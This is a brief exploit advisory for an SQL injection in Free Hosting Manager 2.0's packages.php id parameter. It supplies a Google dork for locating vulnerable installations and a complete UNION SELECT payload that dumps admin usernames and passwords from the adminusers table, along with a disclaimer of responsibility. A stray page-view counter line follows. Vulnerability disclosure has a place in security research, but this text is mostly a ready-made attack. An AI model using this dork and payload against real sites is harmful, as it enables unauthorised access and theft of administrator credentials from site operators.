########################################################################## ## Free Hosting Manager V2.0 SQL Injection Vulnerability ## Google Dork: inurl:clients/packages.php?id=1 ## Bug discovered by Yakir Wizman AKA Pr0T3cT10n, <yakir.wizman@gmail.com> ## Date: 29/11/2012 ## Version: 2.0 ## Software Link: http://www.fhm-script.com/download.php ## ISRAEL ########################################################################## ## Author will be not responsible for any damage. ########################################################################## ## SQL Injection PoC: ## http://www.example.com/clients/packages.php?id=-1'+UNION+ALL+SELECT+1,CONCAT(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+adminusers%23 ########################################################################## # 0x31337.net ##########################################################################Брой прочитания на тази страница: 1040
Free Hosting Manager 2.0 (packages.php, id param) SQL Injection Vulnerability